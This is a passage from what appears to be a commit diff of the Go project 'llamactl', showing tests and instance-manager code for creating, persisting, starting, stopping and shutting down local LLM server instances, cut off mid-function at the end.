LlamaServerOptions: llamactl.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if !instance.Running {
t.Error("Expected running to be true")
}
opts := instance.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("Expected running to be false")
}
opts := instance.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{
name: "valid positive values",
maxRestarts: intPtr(10),
restartDelay: intPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: intPtr(0),
restartDelay: intPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: intPtr(-5),
restartDelay: intPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
}
})
}
}

View File

@@ -1,249 +0,0 @@
package llamactl
import (
"fmt"
"sync"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*Instance, error)
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
GetInstance(name string) (*Instance, error)
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*Instance, error)
StopInstance(name string) (*Instance, error)
RestartInstance(name string) (*Instance, error)
GetInstanceLogs(name string) (string, error)
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*Instance
ports map[int]bool
instancesConfig InstancesConfig
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
return &instanceManager{
instances: make(map[string]*Instance),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
}
}
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*Instance, 0, len(im.instances))
for _, instance := range im.instances {
instances = append(instances, instance)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
err := ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign a port if not specified
if options.Port == 0 {
port, err := im.getNextAvailablePort()
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
}
instance := NewInstance(name, &im.instancesConfig, options)
im.instances[instance.Name] = instance
im.ports[options.Port] = true
return instance, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.Running
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
return instance, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
_, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if im.instances[name].Running {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, im.instances[name].options.Port)
delete(im.instances, name)
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
return instance, nil
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.Running {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}

298
pkg/manager/manager.go Normal file
View File

@@ -0,0 +1,298 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
backendsConfig config.BackendConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
backendsConfig: backendsConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im
}
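// Worked example of the wiring above: with TimeoutCheckInterval = 5 the ticker
// fires every 5 minutes and each tick runs checkAllTimeouts (timeout.go);
// closing shutdownChan in Shutdown() makes the goroutine return, which closes
// shutdownDone and unblocks the waiting shutdown path.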
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
if err := os.Rename(tempPath, instancePath); err != nil {
os.Remove(tempPath) // Clean up temp file
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
}
return nil
}
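// Worked example of the write above: an instance named "demo" is serialized to
// "<InstancesDir>/demo.json.tmp" and then atomically renamed to
// "<InstancesDir>/demo.json", so readers never observe a half-written file.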
func (im *instanceManager) Shutdown() {
im.mu.Lock()
// Check if already shutdown
if im.isShutdown {
im.mu.Unlock()
return
}
im.isShutdown = true
// Signal the timeout checker to stop
close(im.shutdownChan)
// Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone
// Now stop the ticker
if im.timeoutChecker != nil {
im.timeoutChecker.Stop()
}
// Stop instances without holding the manager lock
var wg sync.WaitGroup
wg.Add(len(runningInstances))
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) {
defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name)
// Attempt to stop the instance gracefully
if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err)
}
}(runningNames[i], inst)
}
wg.Wait()
fmt.Println("All instances stopped.")
}
// loadInstances restores all instances from disk
func (im *instanceManager) loadInstances() error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
// Check if instances directory exists
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
return nil // No instances directory, start fresh
}
// Read all JSON files from instances directory
files, err := os.ReadDir(im.instancesConfig.InstancesDir)
if err != nil {
return fmt.Errorf("failed to read instances directory: %w", err)
}
loadedCount := 0
for _, file := range files {
if file.IsDir() || !strings.HasSuffix(file.Name(), ".json") {
continue
}
instanceName := strings.TrimSuffix(file.Name(), ".json")
instancePath := filepath.Join(im.instancesConfig.InstancesDir, file.Name())
if err := im.loadInstance(instanceName, instancePath); err != nil {
log.Printf("Failed to load instance %s: %v", instanceName, err)
continue
}
loadedCount++
}
if loadedCount > 0 {
log.Printf("Loaded %d instances from persistence", loadedCount)
// Auto-start instances that have auto-restart enabled
go im.autoStartInstances()
}
return nil
}
// loadInstance loads a single instance from its JSON file
func (im *instanceManager) loadInstance(name, path string) error {
data, err := os.ReadFile(path)
if err != nil {
return fmt.Errorf("failed to read instance file: %w", err)
}
var persistedInstance instance.Process
if err := json.Unmarshal(data, &persistedInstance); err != nil {
return fmt.Errorf("failed to unmarshal instance: %w", err)
}
// Validate the instance name matches the filename
if persistedInstance.Name != name {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created
inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps
if inst.GetPort() > 0 {
port := inst.GetPort()
if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
}
im.ports[port] = true
}
im.instances[name] = inst
return nil
}
// autoStartInstances starts instances that were running when persisted and have auto-restart enabled
func (im *instanceManager) autoStartInstances() {
im.mu.RLock()
var instancesToStart []*instance.Process
for _, inst := range im.instances {
if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart {
instancesToStart = append(instancesToStart, inst)
}
}
im.mu.RUnlock()
for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects a stopped instance)
inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
}
}
}
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}

211
pkg/manager/manager_test.go Normal file
View File

@@ -0,0 +1,211 @@
package manager_test
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"os"
"path/filepath"
"strings"
"sync"
"testing"
)
func TestNewInstanceManager(t *testing.T) {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 5,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
mgr := manager.NewInstanceManager(backendConfig, cfg)
if mgr == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := mgr.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestPersistence(t *testing.T) {
tempDir := t.TempDir()
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 10,
TimeoutCheckInterval: 5,
}
// Test instance persistence on creation
manager1 := manager.NewInstanceManager(backendConfig, cfg)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager1.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Check that JSON file was created
expectedPath := filepath.Join(tempDir, "test-instance.json")
if _, err := os.Stat(expectedPath); os.IsNotExist(err) {
t.Errorf("Expected persistence file %s to exist", expectedPath)
}
// Test loading instances from disk
manager2 := manager.NewInstanceManager(backendConfig, cfg)
instances, err := manager2.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Fatalf("Expected 1 loaded instance, got %d", len(instances))
}
if instances[0].Name != "test-instance" {
t.Errorf("Expected loaded instance name 'test-instance', got %q", instances[0].Name)
}
// Test port map populated from loaded instances (port conflict should be detected)
_, err = manager2.CreateInstance("new-instance", options) // Same port
if err == nil || !strings.Contains(err.Error(), "port") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test file deletion on instance deletion
err = manager2.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
if _, err := os.Stat(expectedPath); !os.IsNotExist(err) {
t.Error("Expected persistence file to be deleted")
}
}
func TestConcurrentAccess(t *testing.T) {
mgr := createTestManager()
defer mgr.Shutdown()
// Test concurrent operations
var wg sync.WaitGroup
errChan := make(chan error, 10)
// Concurrent instance creation
for i := range 5 {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
if _, err := mgr.CreateInstance(instanceName, options); err != nil {
errChan <- err
}
}(i)
}
// Concurrent list operations
for i := 0; i < 3; i++ {
wg.Add(1)
go func() {
defer wg.Done()
if _, err := mgr.ListInstances(); err != nil {
errChan <- err
}
}()
}
wg.Wait()
close(errChan)
// Check for any errors during concurrent access
for err := range errChan {
t.Errorf("Concurrent access error: %v", err)
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
mgr.Shutdown()
// Multiple shutdowns should not panic
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(backendConfig, cfg)
}

316
pkg/manager/operations.go Normal file
View File

@@ -0,0 +1,316 @@
package manager
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
name, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
}
// DeleteInstance removes a stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
instance, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
}
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
}
return false
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
return options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
return options.VllmServerOptions.Port
}
}
return 0
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
options.MlxServerOptions.Port = port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
options.VllmServerOptions.Port = port
}
}
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
